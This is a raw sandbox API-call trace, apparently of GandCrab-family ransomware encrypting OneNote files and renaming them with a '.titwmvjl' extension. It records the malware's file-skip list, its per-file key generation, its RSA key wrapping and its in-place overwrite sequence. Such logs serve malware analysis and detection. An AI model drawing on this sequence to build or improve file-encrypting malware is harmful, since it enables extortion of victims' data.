[0091.251] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0091.251] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0091.251] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock" [0091.251] lstrlenW (lpString=".titwmvjl") returned 9 [0091.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock") returned 86 [0091.252] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.252] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0091.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock") returned 86 [0091.252] lstrlenW (lpString=".lock") returned 5 [0091.252] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.252] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0091.252] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.252] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.252] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.252] lstrcmpW (lpString1="Open Notebook.onetoc2", lpString2=".") returned 1 [0091.252] lstrcmpW (lpString1="Open Notebook.onetoc2", lpString2="..") returned 1 [0091.252] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="Open Notebook.onetoc2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" [0091.252] lstrlenW (lpString=".titwmvjl") returned 9 [0091.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.252] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.253] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2.titwmvjl") returned 92 [0091.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.253] lstrlenW (lpString=".onetoc2") returned 8 [0091.253] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.253] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".onetoc2 ") returned 9 [0091.253] lstrcmpiW (lpString1=".onetoc2", lpString2=".titwmvjl") returned -1 [0091.253] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="desktop.ini") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="autorun.inf") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntuser.dat") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="iconcache.db") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="bootsect.bak") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="boot.ini") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntuser.dat.log") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="thumbs.db") returned -1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="KRAB-DECRYPT.html") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="CRAB-DECRYPT.html") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntldr") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="NTDETECT.COM") returned 1 [0091.253] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="Bootfont.bin") returned 1 [0091.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.254] lstrlenW (lpString=".onetoc2") returned 8 [0091.254] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.254] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".onetoc2 ") returned 9 [0091.254] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.254] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.254] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0091.255] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.255] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0091.263] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.263] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0091.264] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.264] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.264] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.264] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0091.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.264] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.264] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.264] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0091.265] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.265] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.265] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.265] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0091.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.265] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.265] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.266] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0091.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.266] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503978) returned 1 [0091.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.266] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0091.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.266] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0091.267] GetLastError () returned 0x0 [0091.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.267] CryptDestroyKey (hKey=0x503978) returned 1 [0091.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.267] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.267] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0091.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.268] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5033b8) returned 1 [0091.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.268] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0091.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.268] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0091.268] GetLastError () returned 0x0 [0091.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.268] CryptDestroyKey (hKey=0x5033b8) returned 1 [0091.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.269] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.269] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.269] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.269] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x1828, lpOverlapped=0x0) returned 1 [0091.279] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffffe7d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.280] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1828, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x1828, lpOverlapped=0x0) returned 1 [0091.281] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.281] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0091.282] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.285] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.285] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.286] CloseHandle (hObject=0x2bc) returned 1 [0091.286] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2.titwmvjl"), dwFlags=0x1) returned 1 [0091.287] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.287] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.287] lstrcmpW (lpString1="Quick Notes.one", lpString2=".") returned 1 [0091.287] lstrcmpW (lpString1="Quick Notes.one", lpString2="..") returned 1 [0091.287] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="Quick Notes.one" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" [0091.287] lstrlenW (lpString=".titwmvjl") returned 9 [0091.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.287] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.287] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one.titwmvjl") returned 86 [0091.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.287] lstrlenW (lpString=".one") returned 4 [0091.287] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.288] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".one ") returned 5 [0091.288] lstrcmpiW (lpString1=".one", lpString2=".titwmvjl") returned -1 [0091.288] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="desktop.ini") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="autorun.inf") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntuser.dat") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="iconcache.db") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="bootsect.bak") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="boot.ini") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntuser.dat.log") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="thumbs.db") returned -1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="KRAB-DECRYPT.html") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="CRAB-DECRYPT.html") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntldr") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="NTDETECT.COM") returned 1 [0091.288] lstrcmpiW (lpString1="Quick Notes.one", lpString2="Bootfont.bin") returned 1 [0091.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.288] lstrlenW (lpString=".one") returned 4 [0091.288] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.288] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".one ") returned 5 [0091.289] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.289] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.289] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0091.289] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.289] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0091.298] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.299] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0091.299] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.299] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.299] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.299] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0091.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.300] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.300] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.300] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0091.300] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.301] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.301] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.301] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0091.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.301] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.301] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.301] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0091.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.302] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5037f8) returned 1 [0091.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.302] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0091.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.302] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0091.302] GetLastError () returned 0x0 [0091.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.302] CryptDestroyKey (hKey=0x5037f8) returned 1 [0091.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.303] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.303] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0091.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.303] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5038f8) returned 1 [0091.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.304] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0091.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.304] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0091.304] GetLastError () returned 0x0 [0091.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.304] CryptDestroyKey (hKey=0x5038f8) returned 1 [0091.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.304] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.304] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.304] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.305] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x57ec8, lpOverlapped=0x0) returned 1 [0091.337] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffa8138, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.337] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x57ec8, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x57ec8, lpOverlapped=0x0) returned 1 [0091.346] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.346] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0091.357] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.361] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.362] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.362] CloseHandle (hObject=0x2bc) returned 1 [0091.363] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one.titwmvjl"), dwFlags=0x1) returned 1 [0091.363] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.364] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.364] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.364] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.364] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\TITWMVJL-DECRYPT.txt" [0091.364] lstrlenW (lpString=".titwmvjl") returned 9 [0091.364] 